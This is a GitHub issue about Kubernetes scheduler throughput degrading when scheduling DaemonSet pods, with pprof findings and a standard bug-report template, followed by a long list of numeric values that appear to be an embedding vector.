This is a GitHub Issue repo:kubernetes owner:kubernetes Title : Throughput degradation scheduling daemonset pods Issue date: --- start body --- ### What happened? https://github.com/kubernetes/kubernetes/pull/119779 added some map queries and creations that add non-negligible latency. The pprof reveals the following lines inside `findNodesThatFitPod` as too expensive: - 22.2% https://github.com/kubernetes/kubernetes/blob/44bd04c0cbddde69aaeb7a90d3bd3de4e417f27f/pkg/scheduler/schedule_one.go#L492 - 21.7% https://github.com/kubernetes/kubernetes/blob/44bd04c0cbddde69aaeb7a90d3bd3de4e417f27f/pkg/scheduler/schedule_one.go#L489 ![image](https://github.com/kubernetes/kubernetes/assets/1299064/d82a658e-ae01-4bcd-9e0d-6ab892bee6c2) ### What did you expect to happen? Scheduler to keep a throughput of 300 pods/s ### How can we reproduce it (as minimally and precisely as possible)? Schedule 5k daemonset pods giving 300 qps to the scheduler ### Anything else we need to know? _No response_ ### Kubernetes version <details> ```console $ kubectl version # paste output here ``` v1.30 </details> ### Cloud provider <details> GKE </details> ### OS version <details> ```console # On Linux: $ cat /etc/os-release # paste output here $ uname -a # paste output here # On Windows: C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture # paste output here ``` </details> ### Install tools <details> </details> ### Container runtime (CRI) and version (if applicable) <details> </details> ### Related plugins (CNI, CSI, ...) and versions (if applicable) <details> </details> --- end body ---
1,707
[ -0.017409248277544975, -0.00885121338069439, -0.006257975939661264, 0.011203626170754433, -0.0035774819552898407, -0.01003091037273407, -0.009633024223148823, 0.05271637812256813, -0.005706519819796085, -0.0027223764918744564, 0.012236732989549637, 0.014784598723053932, -0.014226161874830723, -0.004666432738304138, 0.023817304521799088, 0.04417230188846588, -0.023454319685697556, -0.007315514143556356, 0.009039686061441898, 0.00011354142043273896, -0.027642592787742615, 0.002434432739391923, 0.02725168690085411, 0.046992406249046326, -0.0023052943870425224, -0.0025688065215945244, 0.012306537479162216, 0.009318904019892216, -0.0202014297246933, -0.008907057344913483, -0.015161543153226376, 0.03317110985517502, 0.0283964816480875, 0.011838847771286964, 0.0356561504304409, 0.024124443531036377, 0.0416872613132, -0.00521788839250803, 0.01658555492758751, -0.047774218022823334, -0.05751892924308777, -0.012543872930109501, -0.03224968910217285, 0.03864378482103348, 0.02060629613697529, -0.005287692882120609, 0.0028742013964802027, 0.01823294162750244, -0.0314120352268219, -0.012439166195690632, 0.01749301329255104, -0.011001192964613438, -0.0104218153283, -0.05366571992635727, 0.008669721893966198, -0.02850816771388054, 0.03132827207446098, 0.037806130945682526, 0.019070595502853394, 0.013967885635793209, 0.0328918918967247, 0.0071375127881765366, -0.015957314521074295, 0.033143188804388046, 0.04428398981690407, 0.00806940346956253, -0.0472157821059227, 0.037331461906433105, -0.022100113332271576, 0.0009545768843963742, -0.022435175254940987, -0.020313117653131485, -0.006470879539847374, 0.02806141972541809, 0.0553131066262722, -0.07343436032533646, 0.015412839129567146, 0.01611088402569294, -0.037136007100343704, -0.03138411417603493, -0.02951335348188877, -0.013507175259292126, -0.03998403251171112, -0.014282005839049816, 0.06427600979804993, -0.0223234873265028, -0.01499401219189167, -0.06187473237514496, 0.016794968396425247, -0.001296619069762528, -0.0197546798735857, 0.002422217046841979, 0.006956020835787058, -0.03856002166867256, -0.0016177198849618435, 0.030406851321458817, -0.04676903039216995, 0.02242121286690235, -0.017102109268307686, -0.020145585760474205, -0.05464298278093338, -0.035544466227293015, -0.005127142183482647, -0.0037589736748486757, 0.03721977397799492, 0.0076226540841162205, -0.022784197703003883, -0.01570601761341095, -0.003378539113327861, 0.11196646094322205, 0.055843621492385864, -0.02603708766400814, -0.03772236406803131, -0.0038217976689338684, -0.03224968910217285, 0.016236532479524612, -0.016055040061473846, -0.0026455915067344904, -0.029625041410326958, -0.0021185672376304865, -0.012655560858547688, -0.002197097521275282, 0.0013856198638677597, 0.0119016719982028, -0.004310429561883211, 0.010617268271744251, -0.0065302131697535515, 0.018665730953216553, -0.027195842936635017, -0.04202232509851456, 0.01668328233063221, 0.006505781784653664, -0.02681889943778515, -0.017576780170202255, 0.01613880693912506, -0.01742320880293846, 0.004833963233977556, 0.07326682657003403, -0.0034902263432741165, -0.017786193639039993, 0.016906656324863434, -0.04528917744755745, 0.028954917564988136, -0.03224968910217285, -0.009549259208142757, 0.002411746419966221, -0.009975066408514977, 0.0282987542450428, -0.01806541159749031, 0.046350203454494476, -0.005807736422866583, -0.021834855899214745, 0.014505380764603615, 0.03406460955739021, -0.008250894956290722, 0.0006923736655153334, -0.013549058698117733, -0.016362180933356285, -0.020285194739699364, 0.012062221765518188, -0.013402468524873257, -0.013200035318732262, -0.0041847811080515385, -0.012201830744743347, -0.004463999532163143, 0.01384921744465828, 0.0003560030891094357, 0.015761861577630043, -0.02979257144033909, 0.012816110625863075, 0.004495411645621061, -0.028759464621543884, 0.0027363374829292297, -0.001964997500181198, -0.005001494195312262, 0.023342633619904518, 0.012306537479162216, 0.019880328327417374, 0.01594335399568081, 0.0038252880331128836, -0.007538888603448868, 0.023189064115285873, -0.0019091537687927485, -0.019126439467072487, 0.030183477327227592, -0.02610689215362072, -0.0013716588728129864, -0.004268546588718891, 0.028424402698874474, 0.011803945526480675, 0.014142396859824657, 0.020187469199299812, 0.013800354674458504, -0.009849418886005878, -0.05307936295866966, 0.0023210004437714815, -0.017409248277544975, 0.004498901776969433, 0.04816512390971184, -0.020047860220074654, -0.037778209894895554, -0.010303148068487644, -0.017855998128652573, -0.029680883511900902, -0.016836851835250854, 0.030099712312221527, 0.03241722285747528, 0.003957916516810656, 0.012013358995318413, -0.02272835373878479, -0.0238033439964056, 0.004579176660627127, 0.026330266147851944, -0.014533301815390587, 0.006076483987271786, 0.019810523837804794, 0.005189966410398483, 0.021723167970776558, -0.03853209689259529, -0.015999197959899902, 0.010037890635430813, 0.008683683350682259, -0.00200862530618906, -0.0024239621125161648, -0.003943955525755882, -0.025715988129377365, 0.0159014705568552, -0.02867569960653782, -0.0070816692896187305, -0.015189465135335922, 0.02982049249112606, 0.014135416597127914, 0.021667324006557465, 0.019293971359729767, 0.021388106048107147, 0.0018864673329517245, -0.038448333740234375, 0.009193255566060543, 0.03719185292720795, 0.00014909810852259398, 0.007636615075170994, -0.012515951879322529, -0.03512563556432724, -0.022100113332271576, -0.026232540607452393, 0.043418414890766144, 0.013556038960814476, 0.013311723247170448, 0.031998395919799805, 0.022309526801109314, -0.012739325873553753, -0.01932189241051674, -0.00802053976804018, -0.006191661581397057, 0.01465895026922226, -0.02151375450193882, 0.011699238792061806, 0.010917427949607372, -0.0001793103729141876, 0.0014676401624456048, 0.043893083930015564, 0.01038691308349371, -0.04249699413776398, 0.036493804305791855, -0.0023524125572293997, -0.010037890635430813, -0.019363775849342346, 0.032333455979824066, 0.009695848450064659, 0.025576377287507057, -0.005137613043189049, -0.03043477237224579, -0.03493018448352814, -0.009975066408514977, 0.022672509774565697, -0.030546460300683975, 0.025506572797894478, 0.011748101562261581, 0.026330266147851944, 0.021960504353046417, -0.005102710798382759, 0.02144395001232624, -0.008551054634153843, 0.036968477070331573, -0.0269166249781847, 0.000022372896637534723, 0.043278805911540985, -0.08828876167535782, -0.008006579242646694, 0.000475107051897794, -0.026763055473566055, -0.0032005375251173973, 0.019461501389741898, 0.029876336455345154, 0.017479052767157555, -0.015259269624948502, 0.005371458362787962, 0.03573991730809212, 0.005162044893950224, 0.022295566275715828, -0.015678096562623978, 0.03582368418574333, 0.016152767464518547, -0.0007774478872306645, -0.016124844551086426, -0.023970874026417732, -0.021471872925758362, 0.02705623395740986, -0.009737730957567692, -0.011873750016093254, 0.014323888346552849, -0.03163541108369827, 0.018428394570946693, -0.048751480877399445, 0.03403668478131294, 0.016473868861794472, 0.03613082319498062, -0.006470879539847374, -0.009039686061441898, -0.03769444301724434, 0.030546460300683975, -0.03272436186671257, -0.029401665553450584, 0.01498005073517561, -0.00732947513461113, -0.015761861577630043, -0.02205822989344597, 0.014226161874830723, -0.014631028287112713, -0.006606998387724161, 0.008893096819519997, 0.022449135780334473, -0.04015156254172325, -0.022923806682229042, 0.0030609285458922386, -0.032333455979824066, -0.03191462904214859, 0.01759074069559574, 0.05112483352422714, -0.016152767464518547, -0.02198842540383339, -0.011789984069764614, -0.0197546798735857, 0.0019318402046337724, 0.010044870898127556, -0.010449737310409546, -0.03043477237224579, 0.028494207188487053, 0.020759865641593933, -0.01870761252939701, 0.0008917528321035206, 0.013521136716008186, 0.006055542733520269, 0.006586057133972645, 0.03850417584180832, -0.010540483519434929, -0.04576384648680687, -0.00171370105817914, 0.01604107953608036, -0.02489229291677475, 0.045847613364458084, -0.043893083930015564, -0.001011293032206595, 0.03540485352277756, -0.009723770432174206, 0.01982448436319828, -0.013262859545648098, -0.010708014480769634, -0.035851605236530304, -0.00878140889108181, -0.029876336455345154, 0.020117664709687233, 0.003978857770562172, 0.014505380764603615, -0.02218387834727764, -0.014435576274991035, 0.0006544174393638968, 0.03532109037041664, -0.07806938141584396, 0.02404067851603031, -0.023426398634910583, 0.04244115203619003, 0.000240389330429025, -0.015343034639954567, 0.024906255304813385, 0.035376932471990585, 0.022742314264178276, 0.035069793462753296, -0.009402669966220856, 0.04453528672456741, -0.025981243699789047, 0.03236137703061104, -0.03255683183670044, -0.05441960692405701, -0.012432185932993889, 0.036689259111881256, 0.016571594402194023, -0.03353409469127655, 0.005807736422866583, -0.037498991936445236, -0.006244014948606491, 0.019810523837804794, 0.009018744342029095, 0.035879526287317276, -0.008886116556823254, 0.03333863988518715, -0.0045407842844724655, -0.026735132560133934, -0.009088548831641674, -0.022937767207622528, -0.0018149176612496376, -0.007343436125665903, -0.01887514442205429, 0.026190657168626785, 0.037498991936445236, 0.06299160420894623, 0.04302750900387764, 0.02701435051858425, -0.0395093597471714, 0.01112684141844511, -0.05009172856807709, 0.023007571697235107, 0.00967490766197443, -0.015105699189007282, 0.0016386612551286817, -0.0056890686973929405, 0.043948929756879807, 0.01651575043797493, 0.05997604876756668, 0.007804146036505699, -0.012606697157025337, 0.006498801521956921, -0.01675308682024479, -0.01271838415414095, 0.005050357431173325, 0.014882325194776058, 0.0008642672910355031, 0.00089306163135916, 0.012536892667412758, 0.002713650930672884, -0.03856002166867256, -0.050985224545001984, 0.002312274882569909, 0.01823294162750244, -0.01374451071023941, -0.01678100787103176, -0.05629036948084831, 0.04171518608927727, -0.043139196932315826, -0.011189665645360947, -0.06846427917480469, -0.006956020835787058, -0.030071789398789406, -0.02096927911043167, 0.022365370765328407, -0.046350203454494476, 0.003036496927961707, -0.02360789105296135, 0.01908455789089203, -0.00044129547313787043, 0.025115668773651123, 0.03127242624759674, 0.003343636868521571, -0.010777818970382214, -0.0028427892830222845, 0.0365496501326561, 0.014924207702279091, -0.06628637760877609, 0.02965296246111393, -0.0033977353014051914, 0.025953322649002075, 0.028591932728886604, -0.01867969147861004, 0.03079775720834732, -0.014023729600012302, 0.03015555441379547, -0.0009685378172434866, -0.03800158202648163, -0.004673413001000881, -0.028731543570756912, -0.015356995165348053, -0.020187469199299812, -0.00019392569083720446, 0.027363374829292297, 0.012034299783408642, 0.014205221086740494, -0.0054238117299973965, 0.04738331213593483, -0.04174310714006424, -0.011838847771286964, 0.005291183013468981, -0.03920222073793411, -0.036019135266542435, -0.026832859963178635, 0.03864378482103348, 0.0004672540526371449, 0.024264052510261536, -0.026623446494340897, 0.05575985461473465, -0.02867569960653782, 0.00039941276190802455, -0.056653354316949844, 0.004502391908317804, -0.03610290214419365, -0.031160740181803703, -0.02046668715775013, 0.04110090434551239, -0.0012050006771460176, -0.015552448108792305, -0.04065415635704994, 0.020187469199299812, 0.0038322685286402702, 0.012899876572191715, -0.025255277752876282, -0.021709207445383072, 0.0019545266404747963, 0.011036095209419727, 0.0068792360834777355, 0.02586955763399601, 0.019098518416285515, -0.007524928078055382, -0.031076975166797638, 0.01280215010046959, 0.01028220634907484, -0.061986420303583145, 0.002300059190019965, 0.018358590081334114, 0.028005575761198997, -0.001515630749054253, 0.01491024624556303, -0.0016447691014036536, 0.01141303963959217, -0.013220977038145065, 0.04076584428548813, -0.007866970263421535, -0.01968487538397312, -0.0014440810773521662, 0.006840843707323074, -0.027907850220799446, 0.01685081236064434, 0.014952129684388638, 0.009863379411399364, -0.035376932471990585, -0.006697744131088257, -0.030099712312221527, 0.0053679682314395905, -0.022979650646448135, 0.002514708088710904, 0.011608492583036423, -0.005036396440118551, -0.013283801265060902, -0.026958508417010307, -0.000530078134033829, 0.0020644688047468662, -0.038448333740234375, -0.015719980001449585, 0.03384123370051384, 0.012027319520711899, 0.016976460814476013, -0.014282005839049816, -0.015356995165348053, 0.015175503678619862, 0.030183477327227592, -0.023496203124523163, -0.015370956622064114, -0.014463497325778008, -0.019810523837804794, -0.0001400453329551965, -0.00886517483741045, -0.00036320165963843465, 0.030825678259134293, -0.014505380764603615, -0.014379732310771942, -0.04431191459298134, -0.02394295297563076, 0.00999600812792778, -0.010142597369849682, -0.029932180419564247, -0.022714393213391304, -0.039425596594810486, 0.027670513838529587, 0.015217386186122894, -0.002977163065224886, -0.002741572679951787, 0.03761067986488342, -0.03501395136117935, 0.006006679497659206, -0.024208208546042442, 0.006753587629646063, 0.00540287047624588, 0.007350416388362646, 0.028550051152706146, 0.012927798554301262, -0.015035894699394703, 0.001971977762877941, -0.0003577481838874519, -0.015999197959899902, 0.004516352899372578, -0.014365771785378456, -0.037498991936445236, 0.005130632780492306, 0.031858786940574646, -0.01580374501645565, -0.02519943378865719, -0.018358590081334114, 0.017772233113646507, -0.04461905360221863, 0.007476064842194319, -0.01597127504646778, 0.040542468428611755, 0.013556038960814476, 0.0026508269365876913, 0.027921810746192932, -0.03920222073793411, 0.009074588306248188, 0.03914637863636017, 0.03895092383027077, 0.003266851883381605, 0.01587354950606823, 0.015496605075895786, 0.004055642988532782, -0.007873950526118279, 0.0023977854289114475, 0.0025670614559203386, 0.012194850482046604, 0.043111275881528854, 0.03814119100570679, -0.010959310457110405, -0.006240524351596832, -0.019838446751236916, -0.022784197703003883, -0.027838043868541718, -0.013186074793338776, -0.039397675544023514, -0.009584161452949047, 0.02323094569146633, -0.015789784491062164, 0.025743909180164337, -0.02708415500819683, -0.03945351764559746, -0.006275427062064409, -0.011105899699032307, -0.017576780170202255, 0.024305935949087143, -0.029373744502663612, 0.00853011291474104, -0.01641802489757538, -0.00042297178879380226, 0.005022435449063778, 0.02117869257926941, -0.010938368737697601, 0.010456717573106289, 0.0014161593280732632, 0.050035882741212845, 0.03130035102367401, -0.01349321473389864, 0.021737128496170044, 0.027167921885848045, 0.0002099589182762429, 0.038587942719459534, -0.03847625479102135, 0.01620861142873764, 0.0011055291397497058, -0.001410924014635384, 0.04517748951911926, 0.020550452172756195, -0.005804246291518211, 0.008837252855300903, -0.014212201349437237, 0.060702014714479446, -0.024836450815200806, 0.005088749807327986, 0.0038217976689338684, 0.005162044893950224, 0.001263461890630424, -0.008837252855300903, -0.0014309927355498075, 0.010952330194413662, -0.02205822989344597, 0.028591932728886604, 0.011050056666135788, -0.02610689215362072, -0.01308834832161665, 0.018051451072096825, -0.004991023801267147, -0.0035303637851029634, -0.0065720961429178715, -0.0023803343065083027, 0.009954125620424747, 0.011929593048989773, 0.02577183023095131, -0.03596329316496849, 0.0021691755391657352, -0.019573189318180084, 0.014156357385218143, -0.003542579710483551, 0.010526522062718868, 0.002273882506415248, -0.000840271997731179, -0.013039485551416874, 0.0056402054615318775, 0.012522932142019272, 0.02499002031981945, 0.014686872251331806, -0.0060869548469781876, 0.034706808626651764, -0.00798563752323389, 0.016864772886037827, -0.01715795323252678, 0.002268647076562047, -0.013227957300841808, -0.03889508172869682, 0.025981243699789047, 0.032947737723588943, -0.010959310457110405, 0.00999600812792778, 0.007224768400192261, -0.018009567633271217, -0.01384921744465828, -0.006704724859446287, 0.014163338579237461, -0.003675208194181323, 0.0018044470343738794, -0.0027974164113402367, 0.003223224077373743, -0.009311923757195473, 0.036493804305791855, -0.02539488673210144, -0.03434382751584053, 0.015301152132451534, 0.0017992116045206785, 0.0027991614770144224, 0.008292777463793755, -0.006551154889166355, -0.019196243956685066, 0.00386717077344656, 0.0461268313229084, 0.0127672478556633, 0.019196243956685066, -0.001395217957906425, 0.010079773142933846, -0.018246902152895927, -0.007497006095945835, 0.022337447851896286, -0.004352312069386244, 0.011133821681141853, 0.0354606993496418, 0.03258475288748741, -0.013255879282951355, -0.010016949847340584, -0.004833963233977556, -0.006139308214187622, -0.014393692836165428, -0.017772233113646507, -0.015287190675735474, 0.008278816938400269, -0.0047501977533102036, -0.015719980001449585, 0.032975658774375916, 0.012753286398947239, 0.01618068851530552, 0.013905061408877373, 0.003066163742914796, 0.026874741539359093, 0.036521729081869125, 0.00270143523812294, -0.009772633202373981, -0.03291981294751167, 0.00540287047624588, 0.02015954628586769, -0.01389808114618063, 0.018121255561709404, -0.03467888757586479, -0.0030190458055585623, -0.00003359342736075632, 0.01084064319729805, -0.016836851835250854, 0.025743909180164337, 0.008355601690709591, 0.027042273432016373, 0.014784598723053932, -0.01006581261754036, -0.013367566280066967, 0.004149878863245249, -0.016739124432206154, -0.0021517244167625904, 0.02039688266813755, -0.004732746630907059, 0.014603106305003166, 0.007315514143556356, -0.03864378482103348, 0.012871954590082169, 0.014261064119637012, -0.023021532222628593, 0.05056639760732651, -0.0007408005185425282, -0.006055542733520269, 0.0011552649084478617, -0.012557834386825562, -0.015538487583398819, 0.0003498951846268028, -0.0037170909345149994, -0.012816110625863075, 0.02441762387752533, -0.023747500032186508, -0.037331461906433105, 0.0036717180628329515, -0.010212401859462261, -0.005926404148340225, 0.016320297494530678, 0.0064185261726379395, 0.019601110368967056, 0.021737128496170044, -0.006641900632530451, 0.02485041134059429, -0.0356561504304409, 0.02222576178610325, -0.01119664590805769, -0.021834855899214745, 0.01050558127462864, -0.005462204106152058, -0.004467489663511515, 0.012243714183568954, 0.004603608511388302, 0.017032304778695107, -0.0027974164113402367, 0.01155264861881733, -0.001977213192731142, 0.045847613364458084, 0.026930585503578186, -0.007922813296318054, 0.031160740181803703, -0.011140801943838596, 0.010973270982503891, -0.019545266404747963, 0.014365771785378456, 0.01611088402569294, 0.015245308168232441, -0.028759464621543884, 0.02556241676211357, 0.02434781938791275, -0.008243914693593979, -0.02931790053844452, -0.003565266029909253, 0.030015945434570312, 0.0004196997033432126, -0.05880333110690117, 0.011992417275905609, -0.01806541159749031, 0.007706419564783573, 0.03305942192673683, 0.005235339514911175, 0.018526121973991394, -0.01091044768691063, -0.022812118753790855, -0.01806541159749031, 0.012669521383941174, 0.006540684029459953, -0.025618260726332664, 0.0055285184644162655, 0.021555637940764427, -0.01156661007553339, -0.001455424353480339, -0.017618661746382713, 0.020354999229311943, 0.021080967038869858, -0.003247655462473631, -0.028926994651556015, -0.017353404313325882, -0.014868363738059998, 0.015440761111676693, 0.016166727989912033, -0.005120161920785904, -0.015538487583398819, -0.007818106561899185, -0.004676903132349253, 0.005409850738942623, -0.02391503006219864, -0.012501990422606468, 0.0020731943659484386, -0.0010339795844629407, 0.0026176697574555874, -0.009695848450064659, 0.025660144165158272, 0.03431590646505356, -0.01725567877292633, 0.00001874633198895026, -0.008257875218987465, -0.030351007357239723, -0.02249101735651493, 0.010980252176523209, -0.02677701599895954, -0.006694253999739885, -0.023496203124523163, 0.003130733035504818, -0.008704624138772488, -0.013109290041029453, 0.024208208546042442, -0.0038567001465708017, -0.026888703927397728, -0.01222277246415615, -0.014784598723053932, 0.00660350825637579, -0.06304744631052017, -0.007538888603448868, -0.027572788298130035, 0.007455123122781515, 0.004443058278411627, -0.01618068851530552, -0.014826481230556965, -0.00810430571436882, -0.018749495968222618, 0.007587751839309931, 0.006104405969381332, 0.016864772886037827, -0.015496605075895786, -0.025715988129377365, -0.014854403212666512, 0.042161934077739716, -0.006470879539847374, -0.03224968910217285, 0.030713990330696106, 0.008376543410122395, 0.00996110588312149, -0.005573891568928957, -0.006917628459632397, 0.007224768400192261, 0.0006199514609761536, -0.014421614818274975, -0.007399279624223709, 0.015217386186122894, 0.0069280993193387985, -0.024208208546042442, -0.01156661007553339, -0.009758672676980495, -0.03727561607956886, -0.010128636844456196, 0.04478658363223076, -0.0012381577398627996, -0.013912041671574116, -0.024152366444468498, -0.0005571273504756391, 0.023147180676460266, -0.012962700799107552, 0.04495411366224289, 0.0325009860098362, 0.02265854924917221, 0.012760267592966557, 0.0034849909134209156, 0.026078971102833748, 0.010519541800022125, 0.004094035364687443, 0.007490025367587805, -0.0031359682325273752, 0.007357397116720676, -0.03188670799136162, -0.027195842936635017, -0.0029422608204185963, 0.0037485030479729176, -0.012864974327385426, -0.0056890686973929405, -0.010924408212304115, 0.03130035102367401, 0.00357224652543664, -0.007922813296318054, -0.018428394570946693, -0.011259470134973526, -0.013046465814113617, -0.025813713669776917, -0.0020906454883515835, 0.016962500289082527, -0.023621851578354836, 0.011420020833611488, 0.00525279063731432, -0.015747901052236557, 0.018749495968222618, 0.01827482506632805, -0.0006788489990867674, 0.006247505079954863, -0.021527715027332306, 0.0004118467040825635, -0.0153849171474576, 0.018288785591721535, 0.021150771528482437, 0.02344035916030407, -0.01370960846543312, -0.02715395949780941, 0.009311923757195473, 0.003399480367079377, 0.005734441801905632, 0.012753286398947239, 0.0015583860222250223, 0.03579575940966606, -0.042329464107751846, 0.014463497325778008, -0.011112880893051624, -0.010945349931716919, -0.020815709605813026, -0.034706808626651764, -0.020382922142744064, -0.0183725506067276, 0.01236238144338131, 0.015356995165348053, -0.002800906542688608, 0.017520936205983162, 0.026790976524353027, -0.0037868954241275787, -0.011468883603811264, -0.03043477237224579, -0.02137414552271366, -0.007008374202996492, -0.0067745293490588665, 0.00967490766197443, -0.03211008012294769, -0.02339847758412361, 0.028159145265817642, 0.01080574095249176, 0.019698837772011757, -0.011622453108429909, -0.008181090466678143, -0.015259269624948502, -0.022379331290721893, -0.002938770456239581, -0.004495411645621061, -0.0005139358108863235, 0.012795169837772846, -0.03448343649506569, 0.006638410501182079, -0.0036891691852360964, 0.006334760691970587, -0.02191862091422081, -0.011824886314570904, 0.03596329316496849, -0.019266048446297646, -0.022477056831121445, -0.02161148190498352, -0.006673312745988369, -0.02087155357003212, -0.018386511132121086, 0.023244906216859818, 0.029094526544213295, 0.009891301393508911, 0.005357497371733189, 0.005099220667034388, -0.018903065472841263, -0.01465895026922226, 0.0059892283752560616, 0.007483045104891062, -0.017744310200214386, -0.04852810502052307, -0.00012401210551615804, 0.00423015421256423, 0.031049052253365517, -0.02029915526509285, -0.0028637307696044445, 0.002675258554518223, 0.005500596482306719, -0.0107917794957757, 0.0030120653100311756, 0.0006797215901315212, -0.002432687673717737, 0.012557834386825562, 0.018316706642508507, -0.022100113332271576, -0.020075781270861626, -0.020885514095425606, 0.002652572002261877, -0.0014676401624456048, 0.013842237181961536, -0.010742916725575924, -0.001548787928186357, -0.007922813296318054, 0.018121255561709404, -0.018484238535165787, 0.0029422608204185963, -0.024403661489486694, 0.016501789912581444, -0.011182685382664204, -0.030825678259134293, -0.016571594402194023, -0.00462803989648819, -0.012243714183568954, 0.0031848314683884382, -0.016194649040699005, -0.026902664452791214, 0.006139308214187622, -0.01264857966452837, -0.00441513629630208, 0.009290982037782669, -0.021499793976545334, -0.02025727368891239, 0.004739727359265089, -0.00355828576721251, -0.020103704184293747, 0.0010235088411718607, 0.018344629555940628, -0.005371458362787962, 0.07935378700494766, -0.0137794129550457, 0.02323094569146633, -0.004135918337851763, -0.01972675882279873, -0.007001393940299749, 0.04285997897386551, 0.010512561537325382, 0.016027119010686874, 0.016501789912581444, 0.06137213855981827, 0.005901972763240337, 0.015482643619179726, -0.008648781105875969, -0.0015339544042944908, 0.0023873148020356894, -0.01759074069559574, -0.0055843619629740715, -0.0052283587865531445, 0.005703029688447714, 0.004355802200734615, -0.0053679682314395905, 0.005975267384201288, 0.012152967974543571, -0.009493415243923664, 0.012913837097585201, -0.00576585391536355, 0.00933984573930502, 0.00630683870986104, 0.0002545683819334954, 0.025283198803663254, -0.020410843193531036, -0.0038811315316706896, -0.01665535941720009, 0.01119664590805769, 0.023733539506793022, -0.022504979744553566, -0.007210807409137487, 0.007901872508227825, -0.010156558826565742, -0.002263411646708846, 0.012313518673181534, -0.006237034220248461, 0.036019135266542435, -0.03258475288748741, -0.022477056831121445, 0.0021936071570962667, -0.00044260433060117066, -0.006648880895227194, 0.0017547112656757236, -0.013604901731014252, -0.0017442406387999654, -0.016236532479524612, 0.014477458782494068, -0.008453328162431717, 0.02850816771388054, -0.0003350617189425975, 0.004509372171014547, 0.010847623459994793, 0.003296518698334694, 0.0045338040217757225, 0.0088163111358881, 0.00042122669401578605, -0.010177499614655972, -0.0077692437916994095, -0.004090545233339071, -0.02039688266813755, -0.031021131202578545, 0.0025234336499124765, 0.024026717990636826, -0.02789388783276081, -0.0021883719600737095, 0.016166727989912033, 0.006334760691970587, 0.0013254134682938457, -0.005797266028821468, -0.01992221176624298, -0.01668328233063221, 0.028452323749661446, -0.02560430020093918, -0.01789787970483303, 0.0053679682314395905, -0.0393139086663723, -0.003247655462473631, -0.00295447651296854, 0.0034710299223661423, -0.0032214787788689137, -0.014966090209782124, 0.02532508224248886, -0.008558034896850586, -0.0030295164324343204, 0.013276821002364159, 0.004945650696754456, -0.011245508678257465, -0.0024850410409271717, 0.02887115254998207, -0.025813713669776917, 0.0056262449361383915, -0.017925802618265152, -0.013723569922149181, -0.007238729391247034, 0.02256082184612751, 0.03548862040042877, -0.0111617436632514, 0.0017006127163767815, 0.022239722311496735, -0.007901872508227825, 0.0163482204079628, -0.010742916725575924, 0.03621458634734154, -0.018791377544403076, 0.0015967785147950053, 0.015231347642838955, 0.00009903516911435872, 0.0230634156614542, -0.013625843450427055, 0.009053646586835384, -0.001142176566645503, 0.011873750016093254, -0.006872255355119705, -0.023007571697235107, -0.01587354950606823, 0.030351007357239723, -0.025255277752876282, 0.01627841591835022, -0.02124849706888199, -0.020243313163518906, -0.012404263950884342, 0.012781208381056786, 0.03331071883440018, 0.01780015416443348, 0.015356995165348053, -0.005036396440118551, -0.008725565858185291, -0.001763436826877296, -0.010917427949607372, -0.00798563752323389, 0.019433580338954926, -0.003230204340070486, 0.008571995422244072, -0.02360789105296135, 0.040849607437849045, 0.012306537479162216, -0.005444752983748913, 0.00353734428063035, -0.007182885892689228, -0.011015154421329498, 0.027782201766967773, -0.0009676652261987329, 0.006844333838671446, 0.014009768143296242, 0.00013895463780499995, -0.0070397863164544106, 0.002071449300274253, -0.015719980001449585, -0.0027660042978823185, 0.004949140828102827, 0.019936172291636467, -0.005898482631891966, 0.03029516339302063, 0.021862776950001717, -0.004261566326022148, 0.020815709605813026, -0.0038636804092675447, -0.003895092522725463, -0.003762464039027691, 0.0036054037045687437, -0.05028717964887619, -0.027433179318904877, -0.010372952558100224, 0.012313518673181534, -0.0037938759196549654, -0.006969981826841831, 0.014714794233441353, 0.008725565858185291, 0.018260864540934563, -0.004774629604071379, 0.002752043306827545, 0.040682077407836914, 0.015650175511837006, 0.007043276447802782, -0.009570199996232986, -0.00960510317236185, -0.0046454910188913345, -0.0004153369227424264, 0.020885514095425606, 0.0029352803248912096, -0.0031795960385352373, -0.02270043082535267, 0.017311522737145424, -0.008229953236877918, 0.03451135754585266, -0.01722775772213936, -0.00193358538672328, 0.015859588980674744, 0.007636615075170994, -0.008243914693593979, -0.017646584659814835, -0.006540684029459953, 0.020550452172756195, 0.008809330873191357, -0.006282407324761152, 0.00106626411434263, -0.011964495293796062, 0.007350416388362646, -0.03738730400800705, 0.0026560621336102486, -0.014505380764603615, 0.006697744131088257, 0.005818207282572985, 0.004530313890427351, -0.008355601690709591, -0.00729457288980484, 0.010058832354843616, 0.02579975314438343, 0.005106200929731131, -0.05014757066965103, -0.04269244894385338, -0.009849418886005878, 0.0045896475203335285, 0.01606900244951248, 0.022351408377289772, 0.00540287047624588, -0.0028253381606191397, 0.03775028884410858, -0.007252690382301807, 0.022784197703003883, 0.0030347518622875214, 0.023747500032186508, 0.005273731891065836, -0.003450088668614626, -0.0024588643573224545, -0.004411646164953709, 0.0014754931908100843, -0.019880328327417374, -0.013144192285835743, -0.0017328973626717925, 0.0017372601432725787, 0.0019859387539327145, 0.005905462894588709, 0.020480647683143616, 0.0005017200019210577, -0.015580370090901852, -0.0003012501692865044, -0.014407654292881489, -0.00013928183761890978, 0.01036597229540348, -0.003751993179321289, -0.021555637940764427, 0.009193255566060543, 0.0016229551983997226, 0.009346826002001762, 0.01668328233063221, -0.002219783840700984, -0.011622453108429909, -0.0099262036383152, -0.0037066203076392412, 0.00671170512214303, -0.0026508269365876913, -0.0077273608185350895, -0.021737128496170044, -0.011168723925948143, 0.019433580338954926, -0.009158353321254253, 0.008215992711484432, 0.006600017659366131, -0.008571995422244072, 0.012878934852778912, 0.009381728246808052, 0.01352811697870493, 0.0001017619069898501, -0.0091862753033638, 0.013877139426767826, -0.012655560858547688, -0.025353003293275833, -0.015329074114561081, -0.004135918337851763, -0.029234135523438454, -0.00923513900488615, -0.013953925110399723, 0.000496920954901725, 0.017883919179439545, -0.002483295975252986, -0.010135617107152939, 0.01782807521522045, -0.029457509517669678, -0.03448343649506569, 0.01739528775215149, 0.008718585595488548, 0.010847623459994793, -0.01587354950606823, 0.0076924585737288, 0.00803450122475624, -0.0009598121978342533, -0.00012619349581655115, 0.019307931885123253, 0.009486434981226921, 0.027516944333910942, -0.017758270725607872, 0.008983842097222805, -0.0010531757725402713, 0.0017974665388464928, 0.020145585760474205, 0.006798960734158754, -0.017716389149427414, -0.004949140828102827, -0.01722775772213936, 0.026302345097064972, -0.0076226540841162205, -0.008872155100107193, 0.009563219733536243, 0.013765452429652214, -0.0074621038511395454, -0.01531511265784502, -0.012599716894328594, -0.00034029706148430705, 